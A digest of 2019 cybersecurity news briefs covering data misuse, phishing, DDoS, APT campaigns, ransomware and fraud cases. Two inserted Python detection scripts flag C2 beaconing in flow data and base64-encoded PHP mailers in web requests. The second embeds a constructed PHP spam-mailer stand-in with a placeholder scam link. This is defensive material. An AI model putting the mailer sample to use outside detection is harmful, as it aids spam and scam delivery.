The Federal Trade Commission (FTC) filed an administrative complaint against data analytics company Cambridge Analytica, and filed settlements for public comment with Cambridge Analytica's former chief executive and an app developer who worked with the company, alleging they employed deceptive tactics to harvest personal information from tens of millions of Facebook users for voter profiling and targeting. The FTC alleges that Cambridge Analytica and two defendants, app developer Aleksandr Kogan and former Cambridge Analytica CEO Alexander Nix, deceived consumers by falsely claiming they did not collect any personally identifiable information from Facebook users who were asked to answer survey questions and share some of their Facebook profile data. Kogan is the developer of the GSRApp that was utilized by Facebook users to answer personality-type questions. Kogan, Nix, and Cambridge Analytica used and analyzed the data collected from the app to train an algorithm to generate personality scores for the app users and their Facebook friends. Those personality scores were then matched to US voter records and used by Cambridge Analytica for voter profiling and targeted advertising services. GSRApp told users it would not download any identifiable information - only demographic data - but the FTC has said that those claims were false and the app collected Facebook User IDs, which connects individuals to their Facebook profiles, as well as other personal information such as their gender, birthdate, location, and their Facebook friends list.
Cofense has observed a wave of phishing attacks that utilize the legitimate file hosting site WeTransfer to deliver malicious URLs to bypass email gateways. The attacks span major industries like banking, power, and media. The attackers are using what appears to be compromised email accounts to send a genuine link to a WeTransfer hosted file. As these are legitimate links from WeTransfer, this allows them to travel straight through security checks at the gateway.
Imperva mitigated a massive distributed denial-of-service attack that peaked at 292,000 packets per second and used 402,000 compromised devices. The attack, sourced back to Brazil, lasted 13 days and hit an Imperva client in the entertainment industry. The attackers used a legitimate User-Agent, the same as used by the entertainment industry customer service application, to mask the attack which targeted the authentication component of the client's streaming application. Upon analysis, the devices used in the attack all had the same open ports which showed their association with the Mirai malware.
Elasticsearch is being abused by turning affected targets into botnet zombies used in distributed denial-of-service (DDoS) attacks. The attack chain involves searching for exposed or publicly accessible Elasticsearch databases/servers. The malware would invoke a shell with an attacker-crafted search query with encoded Java commands. Once this is successfully carried out, the first malicious script is downloaded from a domain, which, in Trend Micro's analysis, appears to be expendable or easy-to-replace. The first-stage script will attempt to shut down the firewall as well as competing and already-running cryptocurrency mining activities and other processes. The second-stage script is then retrieved, likely from a compromised Web site. Using expendable domains allows the attackers to swap URLs as soon as they are detected.
Proofpoint researchers identified a targeted advanced persistent threat (APT) campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. The campaign, dubbed "Operation LagTime IT," uses spear phishing as its attack vector and a Microsoft Equation Editor zero-day bug to deliver a custom malware called Cotx RAT. Additionally, this APT group implements Poison Ivy payloads that share overlapping command and control infrastructure with the Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic tools used in this operation, Proofpoint analysts attribute this activity to the Chinese APT group known as TA428. The group has targeted government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes.
KrebsOnSecurity reported that iNSYNQ, a cloud hosting provider, was hit by a ransomware attack that left its network inaccessible and customers unable to reach their data. iNSYNQ specializes in delivering cloud-based QuickBooks accounting software and services. In a statement, the company said, "The attack impacted data belonging to certain iNSYNQ clients, rendering such data inaccessible. As soon as iNSYNQ discovered the attack, iNSYNQ took steps to contain it. This included turning off some servers in the iNSYNQ environment." CEO Elliot Luchansky said in a separate statement on July 22, "iNSYNQ and our customers were the victims of a malware attack that's a totally new variant that hadn't been detected before, confirmed by the experienced and knowledgeable cybersecurity team we've employed."
According to Symantec telemetry, the average daily volume of business email compromise (BEC) messages was significantly higher in the first quarter of 2019 than in the same period one year ago. From January to March 2018, the average daily BEC email volume was 85,816, while from January to March 2019, the average daily volume was 128,700, a 50% increase. The top five nations targeted by BEC scammers between mid-2018 and mid-2019 were as follows: the US (39%), the UK (26%), Australia (11%), Belgium (3%), and Germany (3%).
Three Romanian citizens - Teodor Laurentiu Costea, Robert Codrut Dumitrescu, and Cosmin Draghici - have been sentenced to federal prison on wire fraud conspiracy, computer fraud and abuse, and aggravated identity theft charges, the Justice Department (DOJ) announced. The "vishing" and "smishing" schemes resulted in the illegal intrusion into computer servers in the US. The men also deployed phishing messages to thousands of victims and subsequently stole victims' Social Security numbers and bank account information. Losses totaled over $21 million USD. Vishing is a type of phishing scheme that communicates a phishing message, or a message that purports to be from a legitimate source, in this case the victims' banks, through a voice recording. Smishing is similar but communicates a phishing message through text messages.
While investigating several ransomware incidents, Synology determined that the causes of these attacks were due to dictionary attacks instead of specific system vulnerabilities. This large-scale attack was targeted at various NAS (network attached storage) models from different vendors, including Synology. In each incident, admins' credentials were stolen by brute-force login attacks, and their data was encrypted. Synology's team strongly recommends users check network and account settings to protect data.
A North Carolina county paid more than $2.5 million USD to a scammer after falling victim to a business email compromise (BEC) scheme that began in November 2018. Cabarrus County officials released details of the scam that diverted a $2,504,601 vendor payment made by the county. Officials have retrieved some of the funds, but more than $1.7 million remains missing. Conspirators posed as representatives of the contracting firm that was to construct a new high school and targeted employees working for the county government by using BEC tactics.
Cisco agreed to settle a case for $8.6 million USD after a whistleblower accused the company of knowingly selling flawed video surveillance software to the US government and other customers, ZDNet reported. The case was brought under the False Claims Act; the suit was filed in May 2011 but was not made public until July 31. James Glenn, a Cisco subcontractor who worked at NetDesign in Denmark, said he discovered security holes in the vendor's Video Surveillance Manager (VSM) and notified Cisco in October 2008. The flaws could have enabled attackers to take control of video surveillance cameras and potentially gain access to networks. Cisco did not fix the vulnerabilities and continued to sell the VSM package to customers, including the US government. When Cisco failed to act, Glenn filed a whistleblower case and 18 states joined in. Cisco patched the bugs in 2013 and retired the VSM package a year later.
The Cobalt Group cybercriminal actor has taken aim at a bank in Kazakhstan with a decoy document that Check Point Software researchers say may have been lifted from the bank's actual Web site. The malicious file was hosted among the documents repository of the bank, which makes it easy to confuse with a legitimate document. Once downloaded and launched, the fake document uses socially-engineered content to trick victims into running the embedded malicious macros.
In a statement posted online, the Georgia Department of Public Safety (DPS) announced that its network servers were offline due to a ransomware attack. Government Technology reported that the incident was first observed on July 26 when certain network services and communication systems were disrupted. DPS Chief Technology Officer Steve Nichols said that once the incident was discovered, employees worked to take all servers offline. The Ryuk ransomware was responsible for the attack.
Dragos identified a new activity group targeting industrial control systems (ICS). HEXANE is targeting oil and gas companies in the Middle East, including Kuwait, as a primary operating region and telecommunication providers in the greater Middle East, Central Asia, and Africa. HEXANE intrusion activity includes malicious documents that drop malware to establish footholds for follow-on activity. The group became operational in mid-2018 but its activity has intensified since early 2019. HEXANE demonstrates similarities to the activity groups MAGNALLIUM and CHRYSENE; all are ICS-targeting activities focusing largely on oil and gas, and some of the behaviors and recently observed tactics, techniques, and procedures are similar. Dragos noted that MAGNALLIUM also has accelerated its activity and has been targeting US government and financial organizations as well as oil and gas companies.
Silk Road operator Gary Davis has been sentenced to a 78 month prison term for his role as a member of the cybercriminal marketplace, the Justice Department (DOJ) announced. During its operation from 2011 until 2013, Silk Road was used by thousands of drug dealers and other unlawful vendors to distribute over $200 million USD worth of illegal drugs and other illicit goods and services to more than 115,000 buyers, and to launder hundreds of millions of dollars derived from those unlawful transactions. Davis worked as a forum moderator and a site administrator for Silk Road and also as an administrator for its next implementation, Silk Road 2.0.
Symantec announced that its technologies blocked 289 million extortion scam emails between January 1 and May 29 - 85 million (nearly 30%) of those messages were blocked in one 17-day period alone. It is not clear which threat actors are behind these scams.
A tactic dubbed "warshipping" by IBM's X-Force Red team of researchers involves the use of ecommerce-related package deliveries by cyber thieves with the intention of hacking into corporate or personal home networks from the office mailroom or from someone's front door. By using warshipping, the scientists could infiltrate a network without being detected. Warshipping involves the use of disposable, low-cost, and low-power computers to remotely perform close-proximity attacks, regardless of a cybercriminal's location. A malicious actor can hide a tiny device (similar to the size of a small cellphone) in a package and ship it off to his or her victim to gain access to a specific network. The device, a 3G-enabled, remotely controlled system, can be tucked into the bottom of a packaging box or stuffed inside an item as it is no bigger than the palm of a hand.
The Australian Cyber Security Center (ACSC) is aware of a high volume of ongoing password spray attacks targeting Australian organizations. The password spray attacks target users on standard corporate external services such as Webmail, remote desktop access, Active Directory Federated Services, or cloud based services such as Office 365. Depending on the credentials and service, successful authentication can potentially lead to the actor gaining access to corporate emails, the corporate directory, global address books, remote desktop services or administrative access. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ACSC advisory.
FireEye has detailed its research into APT41, a Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain and has been conducting simultaneous cybercrime and cyber espionage operations from 2014 onward. This entity has an arsenal of over 46 different malware families and tools to accomplish its missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. In one campaign that ran for nearly a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware, including backdoors, credential stealers, keyloggers, and rootkits.
The Internet Crime Complaint Center (IC3) posted a warning regarding an increase in confidence/romance scams in which an actor deceives a victim into believing they have a trust relationship and uses that relationship to persuade the victim to send money, provide personal and financial information, purchase items of value for the actor, or even launder money. In 2018, the IC3 received complaints from more than 18,000 individuals who had been victimized by these scams and more than $362 million USD was reported stolen. That year, confidence/romance fraud was the seventh most commonly reported scam to the IC3 based on the number of complaints received, and the second costliest scam in terms of victim loss. Tips to protect against such scams are listed in the IC3 alert.
Scientists at Carbon Black identified a cryptocurrency mining campaign, "Access Mining," which has been enhanced to steal system access information for possible sale on the dark Web. This campaign potentially affects over 500,000 systems worldwide, but most have been located in Asia Pacific, Russia and Eastern Europe. Access Mining uses multi-stage malware that sends detailed system metadata to a network of hijacked Web servers, presumably for the purposes of resale on one (or many) remote access marketplaces across the dark Web.
The US Department of Justice (DOJ) uncovered a strange case of fraud and "misuse" of AT&T's network centered around the unlocking of smartphones on the company's network. The crime was perpetrated by Pakistani citizen Muhammad Fahd, who bribed staff at a Bothell, Washington AT&T call center in order to have carrier-locked smartphones unlocked from the AT&T network before the company's policy would normally allow it. While this act is already considered criminal, the much more concerning aspect of the incident may be the fact that Fahd also paid AT&T staff to insert malware and "otherwise misuse" the AT&T network for his personal gain. In exchange for facilitating his criminal activity, the participating workers at the call center were bribed to the tune of $428,500 over a five-year period. The numerous charges against Fahd include wire fraud, five counts of Travel Act violations, conspiracy to violate the Computer Fraud and Abuse Act, and four counts of accessing and damaging protected computers. The DOJ claims the fraud ring unlocked "millions of devices," allowing its ringleader to abuse the early unlocking procedure to make millions of dollars in the process.
The Cybersecurity and Infrastructure Security Agency (CISA) advises businesses and consumers to be vigilant for possible malicious cyber activity seeking to capitalize on the tragic events in El Paso, TX and Dayton, OH. Fraudulent email campaigns are possible after the two mass shootings as some scammers will champion donations for charitable causes, yet use the opportunity to spread malware and siphon money from unsuspecting parties.
Two hackers are attempting to text every mobile phone in the US using SMS gateways, a legitimate technology often utilized by businesses to mass-text users, Wired has reported. The hackers, known by their Twitter handles as @j3ws3r and @0xGiraffe, created a script and generated every possible phone number between 1111111 and 9999999 and then connected them to a list of US area codes. Although many of the messages were filtered out by US carriers, some still got through to cell phone users. "I'm here to warn the masses about SMS email gateways. Please look up how to disable it on your phone or call your provider and ask," was the message spammed out by @j3ws3r.
In the second half of 2019, Kaspersky researchers observed activity in the Middle East including a series of online asset leaks such as code, infrastructure, group, and apparent victim details, allegedly belonging to known Persian-speaking threat actors, OilRig and MuddyWater. Though these leaks originated from different sources, they all appeared within a few weeks of each other. The third online leak, which was said to expose information related to an entity called the "RANA institute," was published in Persian on a Web site called "Hidden Reality." Kaspersky researchers' analysis of the materials, infrastructure, and the dedicated Web site led to the conclusion that this particular leak could be connected to the threat actor Hades. Hades is the cyber threat group behind the OlympicDestroyer incident targeting the 2018 Winter Olympic Games, as well as the ExPetr worm and other disinformation campaigns. Further details about these infiltrations can be gleaned from Kaspersky's quarterly advanced persistent threats summary.
Between July 19 and July 25, several spear phishing emails were identified targeting three US companies in the utilities sector. The phishing emails appeared to impersonate a US-based engineering licensing board with emails originating from what appears to be an actor-controlled domain, nceess[.]com. This URL is believed to be an impersonation of a domain owned by the US National Council of Examiners for Engineering and Surveying. The emails contain a malicious Word attachment that uses macros to install and run malware that Proofpoint researchers have dubbed "LookBack." This malware consists of a remote access Trojan module and a proxy mechanism used for command and control communication. LookBack appears to be the work of a nation-state actor that is targeting utilities systems and critical infrastructure providers.
Palo Alto Networks released details about Rocke, a China-based cybercrime group engaged in cryptomining operations targeting the cloud. By analyzing NetFlow data between December 2018 and June, the researchers found that 28.1% of the cloud environments surveyed had at least one fully established network connection with at least one known Rocke command and control domain. Several of those organizations maintained near daily connections. Meanwhile, 20% of the organizations maintained hourly heartbeats consistent with Rocke tactics, techniques, and procedures. Rocke also released a new backdoor called Godlua, which could function as an agent, allowing the group's actors to perform additional scripted operations, including denial-of-service attacks, network proxying, and two shell capabilities. NetFlow is a capability on Cisco routers that allows for the collection of IP network traffic.
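The NetFlow-based finding above (established sessions to known C2 domains, plus hourly heartbeats) is the kind of check a defender can reproduce from flow data. The script below is an added example and is not Palo Alto Networks code; the flow records, the passive-DNS mapping and the indicator domains (`c2-placeholder-*.invalid`) are all constructed placeholders, not real Rocke infrastructure. It counts only sessions whose TCP flags show both SYN and ACK as "fully established", then looks for hosts whose median interval between such sessions is within 10% of an hour.

```python
"""Flag flow records to known C2 indicators and detect hourly beaconing.

Added example (not from Palo Alto Networks). All flow records and
indicator domains below are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed passive-DNS style mapping: resolved IP -> C2 domain.
# These are placeholders, not real Rocke indicators.
C2_INDICATORS = {
    "203.0.113.10": "c2-placeholder-1.invalid",
    "203.0.113.20": "c2-placeholder-2.invalid",
}


def _flow(ts, src, dst, flags, nbytes):
    """Build a minimal NetFlow-like record (constructed sample data)."""
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "dport": 443, "flags": flags, "bytes": nbytes}


# Constructed flows: one host beacons hourly, one only sends an unanswered
# SYN, one has two irregular sessions, plus a benign connection.
SAMPLE_FLOWS = [
    _flow("2019-06-01T00:00:05", "10.0.0.5", "203.0.113.10", "SAF", 1840),
    _flow("2019-06-01T01:00:02", "10.0.0.5", "203.0.113.10", "SAF", 1790),
    _flow("2019-06-01T02:00:09", "10.0.0.5", "203.0.113.10", "SAF", 1802),
    _flow("2019-06-01T03:01:00", "10.0.0.5", "203.0.113.10", "SAF", 1811),
    _flow("2019-06-01T00:10:00", "10.0.0.7", "203.0.113.20", "S", 60),
    _flow("2019-06-01T09:00:00", "10.0.0.9", "203.0.113.20", "SAF", 5200),
    _flow("2019-06-01T13:30:00", "10.0.0.9", "203.0.113.20", "SAF", 4100),
    _flow("2019-06-01T04:00:00", "10.0.0.5", "198.51.100.8", "SAF", 900),
]


def established_c2_flows(flows, indicators):
    """Return (src, c2_domain, timestamp) for fully established C2 sessions.

    A SYN-only flow (scan, sinkhole or blocked connection) is not counted.
    """
    hits = []
    for f in flows:
        domain = indicators.get(f["dst"])
        if domain is None:
            continue
        if "S" in f["flags"] and "A" in f["flags"]:
            hits.append((f["src"], domain, f["ts"]))
    return hits


def share_of_hosts_with_c2(flows, indicators):
    """Fraction of distinct source hosts with at least one established C2 session."""
    all_hosts = {f["src"] for f in flows}
    c2_hosts = {src for src, _, _ in established_c2_flows(flows, indicators)}
    return len(c2_hosts) / len(all_hosts) if all_hosts else 0.0


def hourly_beacons(flows, indicators, expected=3600.0, tolerance=0.10, min_flows=3):
    """Return {(src, domain): median_gap_seconds} for hosts beaconing about hourly."""
    times = defaultdict(list)
    for src, domain, ts in established_c2_flows(flows, indicators):
        times[(src, domain)].append(ts)
    beacons = {}
    for key, stamps in times.items():
        if len(stamps) < min_flows:
            continue  # too few sessions to call it periodic
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        m = median(gaps)
        if abs(m - expected) <= tolerance * expected:
            beacons[key] = m
    return beacons


if __name__ == "__main__":
    print("hosts with established C2 sessions: %.1f%%"
          % (100 * share_of_hosts_with_c2(SAMPLE_FLOWS, C2_INDICATORS)))
    for (src, domain), gap in hourly_beacons(SAMPLE_FLOWS, C2_INDICATORS).items():
        print(f"{src} beacons to {domain} every ~{gap:.0f}s")
```

The median, rather than the mean, is used for the interval so that a single missed or delayed beacon does not hide an otherwise regular heartbeat; tighten `tolerance` or raise `min_flows` to trade false positives for missed detections.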
Kaspersky researchers have identified a global, emerging trend in spam and phishing delivery techniques. Cybercriminals are increasingly exploiting registration, subscription, and feedback forms on trusted company Web sites to insert spam content or phishing links into confirmation emails. The goal of such campaigns is to have emails originate from a legitimate, reputable source so that users do not ignore the unwanted email. The spam messages appear to come from a legitimate company.
Microsoft researchers discovered infrastructure from STRONTIUM (also known as Sednit, APT28, Pawn Storm, and Fancy Bear) attempting to compromise Internet of Things (IoT) devices, including a voice over IP phone, an office printer, and a video decoder, across multiple customer locations. The investigation showed that the threat actor had used these devices to gain initial access to corporate networks. In two of the cases, the devices had been deployed without changing the manufacturer's default passwords, and in the third the latest security update had not been applied to the device. After gaining access to each of the IoT devices, the actor ran tcpdump to sniff network traffic on local subnets and enumerated administrative groups for further exploitation. As the actor moved from one device to another, they dropped a simple shell script to establish persistence on the network, which allowed extended access to continue hunting.
Cybersecurity research firm CipherTrace found that cryptocurrency theft is on the rise, despite increased security measures by many sites and exchanges. According to the firm's research, "cybercriminals looted $125 million in Bitcoin, Ethereum and other digital assets from exchanges in Q2 2019." CipherTrace pointed to the so-called "exit scam" as the greatest rising threat, claiming that more than $3.1 billion may have been stolen through this vector, which relies on currency exchanges.
A new investigation published by The Wall Street Journal claims that engineers from Chinese smartphone and networks hardware maker Huawei helped certain African governments spy on their political rivals' telecom networks. Specifically, the article's sources claim the company helped authorities in Uganda intercept encrypted messages and allowed police in Zambia to locate opposition bloggers. Huawei's alleged participation ranged from the provision of Israeli malware to tapping phones and illegally accessing political opponents' Facebook pages. Perhaps surprisingly, both governments readily confirmed that they are working with Huawei, but both framed their efforts as combating "fake news," rather than suppressing communications from sources with views that differ from their own.
Kaspersky Lab has published a new study in which it reported that 52 percent of OT/ICS (operational technology and industrial control system) networks incidents were due to "employee errors" or "unintentional actions." The State of Industrial Cybersecurity 2019 report found this issue to primarily be the result of the growing complexity of industrial infrastructure, as well as a general shortage of professionals who understand how to detect new threats.
The cities of Borger and Keene, Texas became two of the latest municipalities to fall victim to a ransomware attack, Sophos reported. In total, 22 departments within the two local governments were affected by the attack. Apparently the attackers demanded $2.5 million to restore the government's access to its systems. The state believes a single threat actor was the culprit for the entire incident, and that the attack was routed through a software provider used by all of the affected departments. The impacted cities were still in the process of attempting to recover their systems at the time of writing. No ransom was paid out.
Avast worked in conjunction with US and French authorities to neutralize 850,000 infections caused by the Retadup malware, which had been distributing a malicious cryptocurrency miner and other malware to computers running the Windows operating system, mostly in Latin America. While analyzing Retadup, Avast identified a design flaw that would allow the malware to be removed from victims' computers if the command and control (C&C) server were taken over. Retadup's C&C infrastructure was mostly located in France, so the team worked with French authorities to stop the threat. Some parts of the C&C infrastructure were also located in the United States, so the French authorities brought in the FBI. The worm's malicious C&C server has been replaced with a disinfection server that causes the connected pieces of malware to self-destruct.
A previously unknown threat entity targeted critical infrastructure organizations without being detected for more than 12 months, the security team at Secureworks advised. The threat group, which may have first become active in April 2018, targets organizations in sectors of strategic national importance, including oil and gas and possibly telecommunications. Its activity is similar to other groups, including OilRig and Elfin, but the researchers suspect this is a new entity entirely. This new group has been dubbed "Hexane" (also known as LYCEUM) and typically accesses an organization using account credentials obtained via password spraying or brute-force attacks. Using compromised accounts, the threat actors send spearphishing emails with malicious Excel attachments to deliver the DanBot malware, which subsequently deploys post-intrusion tools.
Consumers should be aware of romance scams that are finding their way into inboxes. The Federal Trade Commission has produced a video and issued an alert to help consumers avoid such scams.
A campaign known as Heatstroke is using a multi-stage phishing attack to siphon private email addresses and eventually, payment credentials, the researchers at Trend Micro say. Heatstroke's multistage approach tries to mimic what a legitimate Web site would do to lull the potential victim into thinking nothing is amiss. The phishing kit's content is forwarded from another location, but masked to appear as if it was on the landing page itself. The researchers have learned that the phishing attack chain is dynamic, changing its routines depending upon the user's behavior.
The Internal Revenue Service (IRS) is warning taxpayers and tax professionals about an IRS impersonation scam campaign spreading nationally on email. The email subject line may vary, but examples use the phrase "Automatic Income Tax Reminder" or "Electronic Tax Return Reminder." The IRS reminds consumers that it never sends unsolicited emails and never emails taxpayers about the status of refunds.
Over 80 Web sites using the Magento ecommerce platform have been compromised to send payment card data via formjacking to servers under the control of the Magecart gang. Information gleaned by Arxan Technologies and the Aite Group found that 25% of the compromised sites were motorsports or luxury retail brands. Many of the sites were using older versions of Magento that were known to have vulnerabilities.
A US cyber attack on a database belonging to Iran's Islamic Revolutionary Guard Corps prevented the Iranian paramilitary from launching attacks on oil tankers in the Gulf region, the New York Times (NY Times) has learned. According to unnamed US officials, the June 20 attack knocked systems offline and Iran was still attempting to recover data and reestablish its military communications. The attacked database was used to determine which oil tankers to target.
Kenneth Currin Schuchman pled guilty to a hacking charge for operating the Satori botnet, which exploited vulnerabilities across 100,000 Internet of Things (IoT) devices, KrebsOnSecurity reported. Schuchman, a Vancouver, WA resident who used the online monikers "Nexus" and "Nexus-Zeta," built the botnet with at least two other individuals, using leaked code from the Mirai botnet, and used Satori in large-scale distributed denial-of-service attacks between July 2017 and October 2018. The botnet exploited vulnerabilities in routers, digital video recorders, and other IoT devices. Schuchman is facing up to 10 years in prison and fines up to $250,000 USD.
While the TA505 threat actor continues to use either the FlawedAmmyy remote access Trojan or the ServHelper malware as payloads, the group has begun using .ISO image attachments as the point of entry, as well as a .NET downloader, a new style of macro delivery, a newer version of ServHelper, and a .DLL variant of the FlawedAmmyy downloader. Trend Micro's research team has also observed TA505 targeting new countries, such as Turkey, Serbia, Romania, Korea, Canada, the Czech Republic, and Hungary.
A hacker took control of the Twitter account for the social media platform's CEO Jack Dorsey, using it to send offensive tweets. Some of the tweets used the hashtag #ChucklingSquad, which is thought to be the name of the hacking group responsible. Once hijacked, the @jack account spewed messages containing racial epithets and a retweet of a message in support of the Nazis, the AFP reported. Twitter said via tweet that Dorsey's account was "compromised due to a security oversight by the mobile provider" and had been secured. The messages were viewable for about a half hour.
The Gold Blackburn threat group is using Web injects from the Trickbot malware to take aim at Verizon Wireless, T-Mobile, and Sprint. When a victim navigates to the Web site of one of these organizations, the legitimate server response is intercepted by Trickbot and proxied through a command and control (C2) server. This C2 server injects additional HTML and JavaScript into the page, which is then rendered in the victim's Web browser. For all three carriers, injected code causes an additional form field that requests the user's PIN code. SecureWorks provided a write-up of this activity.
Trend Micro detected a spam campaign that uses compromised devices to attack vulnerable Web servers. After brute-forcing devices with weak access credentials, the attackers use them as proxies to forward a base64-encoded PHP script to Web servers. The script sends an email with an embedded link to a scam site to specific email addresses. Some of the samples observed were used for spamming, for redirecting victims to cryptocurrency scams, and for spreading malware to vulnerable servers. The campaign has been seen targeting users in the UK.
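The base64-encoded PHP mailer that the compromised devices forward to web servers is easy to miss in access logs because the payload is opaque until decoded. The detector below is an added example, not Trend Micro's code: it pulls every long base64 run out of constructed request records (path and body), decodes it, and flags payloads that contain both a PHP open tag and a `mail(` call. The request records and the one-line PHP stand-in that seeds them are constructed here for illustration; the script is not a sample from the campaign.

```python
"""Find base64-encoded PHP mailers in web request records.

Added example (not from Trend Micro). The PHP stand-in and the request
records are constructed so the detector has something realistic to decode.
"""
import base64
import binascii
import re

# Constructed stand-in for a forwarded PHP mailer: a one-liner that emails
# a link. It exists only to seed the sample requests below.
_PHP_MAILER = b"<?php mail($_GET['t'], 'Notice', 'http://scam.invalid/login'); ?>"
_ENCODED = base64.b64encode(_PHP_MAILER).decode()

# Constructed request records: (client_ip, method, path, body).
# Two carry the encoded mailer (once in a POST body, once in a query string);
# the others are benign, including a short base64 JSON blob that must not fire.
SAMPLE_REQUESTS = [
    ("198.51.100.23", "POST", "/upload.php", "data=" + _ENCODED),
    ("198.51.100.23", "GET", "/index.php?x=" + _ENCODED, ""),
    ("192.0.2.5", "GET", "/images/logo.png", ""),
    ("192.0.2.8", "POST", "/api",
     "payload=" + base64.b64encode(b'{"ok":true}').decode()),
]

# A run of 40+ base64 alphabet characters with optional padding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Both markers must be present in the decoded bytes to count as a PHP mailer.
PHP_MARKERS = (b"<?php", b"mail(")


def decoded_blobs(text):
    """Yield the decoded bytes of every long base64 run found in text."""
    for m in B64_BLOB.finditer(text):
        try:
            yield base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # long token that is not valid base64 (hex, JWT part, ...)


def is_php_mailer(payload):
    """True when the decoded payload looks like a PHP script that sends mail."""
    return all(marker in payload for marker in PHP_MARKERS)


def scan_requests(requests):
    """Return (ip, method, path_without_query, decoded_script) for each hit."""
    findings = []
    for ip, method, path, body in requests:
        for decoded in decoded_blobs(path + " " + body):
            if is_php_mailer(decoded):
                findings.append((ip, method, path.split("?")[0],
                                 decoded.decode("utf-8", "replace")))
    return findings


if __name__ == "__main__":
    for ip, method, path, script in scan_requests(SAMPLE_REQUESTS):
        print(f"{ip} {method} {path}: {script[:50]}...")
```

Requiring both markers keeps ordinary base64 content (images, tokens, JSON) from firing; if a server legitimately accepts base64 uploads, add the source IP of each hit to the proxy-abuse watch list rather than blocking on the first decode alone.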
Wikipedia was slammed by a massive cyber attack that began on September 6 and lasted nearly three days. Security mitigation company ThousandEyes was monitoring Wikipedia and recorded a "significant drop in HTTP server availability" worldwide and site access was lost in Europe, the Middle East, and Africa. It is not known how large the attack was but information from ThousandEyes shows that it was a standard distributed denial-of-service attack resulting in massive traffic floods. The Wikimedia Foundation, the parent company of Wikipedia, condemned the attacks.
A cyber attack targeting the Web site for the Oklahoma Law Enforcement Retirement System (OLERS) resulted in the theft of $4.2 million USD. The crime is being actively investigated by the FBI but a statement posted to the OLERS site said, "no pension benefits to members or beneficiaries have been impacted or put at risk. All benefits will continue to be paid in a timely fashion as always." OLERS administers retirement and medical benefits to Oklahoma law enforcement.
The Cybersecurity and Infrastructure Security Agency (CISA) has observed an increase in ransomware attacks across the nation. The organization released a document to provide details about ransomware, steps to take to prevent such attacks from occurring, and ways to recover if such incidents impact systems.
A known vulnerability in a firewall used at an unnamed power utility in the western US was exploited to cause communications outages after an attacker launched a denial-of-service attack against a low-impact control center and multiple remote low-impact generation sites. This information comes from E&E News, which obtained a copy of a Lesson Learned Report from the North American Electric Reliability Corporation (NERC). According to E&E News, the incident occurred on March 5 and impacted California, Wyoming, and Utah. The incident was brief: firewall reboots occurred over a 10-hour period, with each firewall being offline for less than five minutes. The report stated, "Given that a firmware update to address the exploited vulnerability had been released prior to the event, the entity's process for assessing and implementing firmware updates was reviewed. Based on this review, the entity decided to implement a more formal and more frequent review of vendor firmware updates that would be tracked within internal compliance tracking software. It should be noted that the entity was already working to develop internal procedures to support this process; however, these were not completed or being practiced at the time of the event."
Symantec has linked two threat groups and now believes they are one and the same. Thrip, a Chinese espionage group, is using a previously unseen backdoor known as Hannotog and another backdoor known as Sagerunex. Analysis of Sagerunex shows close links to another long-established espionage group called Billbug (aka Lotus Blossom), and it is likely the two entities are the same. Since June 2018, Thrip has attacked at least 12 organizations in Southeast Asia, including those in the military, maritime communications, education, and media sectors. The Hannotog backdoor has been in use since at least January 2017 and provides the attackers with a persistent presence on the victim's network. Sagerunex delivers remote access to the attackers.
A post from Trend Micro assesses what information individual cybercrime underground communities discuss in relation to threats and attacks. The Russian underground holds the most discussions on Internet of Things-related attacks while monetization is the main focus of this community. The Portuguese cybercriminal community is the second most active group and many members have discussed KL DNS, a redirection service that allows phishers to capture banking information from infected routers. Individuals in the English-speaking cybercriminal community are most interested in exploiting vulnerabilities, discussing exploit codes, and abusing connected printers.
Facebook removed multiple pages, groups, and accounts that were involved in coordinated inauthentic behavior, including two, unrelated operations that originated in Iraq and Ukraine. According to the report, six accounts, 120 Facebook Pages, one Group, two Events, and seven Instagram accounts were pulled down for engaging in domestic-focused coordinated inauthentic behavior in Iraq. In regards to Ukraine, Facebook removed 168 accounts, 149 Facebook Pages and 79 Groups for similar behavior. Facebook said in a statement, "We're taking down these Pages, Groups and accounts based on their behavior, not the content they posted. In each of these cases, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves..."
A massive distributed denial-of-service (DDoS) attack hit a company in the gaming industry and peaked at 35 Gbps in bandwidth, Akamai reported. According to the vendor, this is the fourth largest DDoS attack it has ever encountered, and the attack used a UDP amplification technique based on WS-Discovery (Web Services Dynamic Discovery). WS-Discovery is a highly exploitable protocol developed to ease network discovery and connectivity for consumer devices.
A threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools and illicit cryptomining malware. Analysis conducted by Cisco shows that Panda uses exploits previously utilized by the Shadow Brokers, a group that published information from the National Security Agency (NSA), and Mimikatz, an open-source credential-dumping program. Panda began employing new command and control and payload-hosting infrastructures around mid-August.
An Ohio gamer involved in a swatting incident that led to a death was sentenced to 15 months in prison, the Department of Justice (DOJ) announced. Nineteen-year-old Casey Viner pleaded guilty to one count of conspiracy and one count of obstructing justice. In his plea, Viner admitted he argued with co-defendant Shane Gaskill while playing Call of Duty World War II online. Viner contacted co-defendant Tyler Barriss and asked him to swat Gaskill. Viner, however, gave Barriss an incorrect address. Barriss then called police and reported a hostage situation at the address given to him. Law enforcement responded to the hoax call and shot and killed Andrew Finch, an innocent man. Barriss is serving a 20-year prison term. The incident took place in December 2017.
A previously undocumented attack group dubbed "Tortoiseshell" is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers' customers. Tortoiseshell has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.
